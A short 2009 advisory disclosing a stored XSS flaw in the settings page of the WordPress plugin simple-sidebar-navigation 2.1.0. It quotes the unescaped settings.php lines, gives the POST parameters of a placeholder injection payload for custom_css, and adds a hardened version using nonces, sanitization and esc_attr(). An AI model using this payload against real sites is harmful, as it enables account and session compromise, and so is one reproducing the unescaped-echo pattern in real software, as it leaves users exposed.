
30.06.2009, 22:50
WordPress Plugin <simple-sidebar-navigation 2.1.0> aXSS Vuln
(c)eLwaux 30.06.2009, uasc.org.ua
## ## ## ## ## ##
aXSS
/simple-sidebar-navigation/settings/settings.php
-----------------------------------------------------------------------------
10: if (isset($_POST['ssn_submit'])):
11: update_option('dropdown_css', $_POST['dropdown_css']);
12: update_option('custom_css', $_POST['custom_css']);
13: update_option('blog_post_links', $_POST['blog_post_links']);
14: update_option('target_attr', $_POST['target_attr']);
...
57: <td><input type="text" name="custom_css" size="100" value="<?php echo $custom_css; ?>">
-----------------------------------------------------------------------------
exploit:
POST: ssn_submit = .
POST: dropdown_css = .
POST: custom_css = ">{XSS}<div id="
POST: blog_post_links = .
POST: target_attr = .
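
A hardened form of the settings.php excerpt above, as an added example that is not part of the original post or the plugin's own code. It assumes the code runs inside the WordPress admin settings page and that the four options are single-line text values; the nonce names `ssn_save_settings` and `ssn_nonce` are hypothetical.

```php
<?php
// Added example, not the plugin's code. Runs inside a WordPress admin page.
// Hypothetical names: nonce action 'ssn_save_settings', nonce field 'ssn_nonce'.

$ssn_fields = array('dropdown_css', 'custom_css', 'blog_post_links', 'target_attr');

if (isset($_POST['ssn_submit'])) {
    // Accept the request only from an administrator using a form this page issued.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.');
    }
    check_admin_referer('ssn_save_settings', 'ssn_nonce');

    foreach ($ssn_fields as $field) {
        // WordPress slashes $_POST; unslash first, then strip tags and control
        // characters before the value is stored (assumes single-line text).
        $raw = isset($_POST[$field]) ? wp_unslash($_POST[$field]) : '';
        update_option($field, sanitize_text_field($raw));
    }
}

$custom_css = get_option('custom_css', '');
?>
<form method="post">
    <?php wp_nonce_field('ssn_save_settings', 'ssn_nonce'); ?>
    <table>
        <tr>
            <!-- esc_attr() encodes quotes and angle brackets, so a stored value
                 such as ">{XSS}<div id=" stays inside the value attribute. -->
            <td><input type="text" name="custom_css" size="100"
                       value="<?php echo esc_attr($custom_css); ?>"></td>
        </tr>
    </table>
    <input type="submit" name="ssn_submit" value="Save">
</form>
```

Escaping at output with `esc_attr()` is the fix for line 57 of the excerpt; sanitizing at input only limits what gets stored and does not replace it.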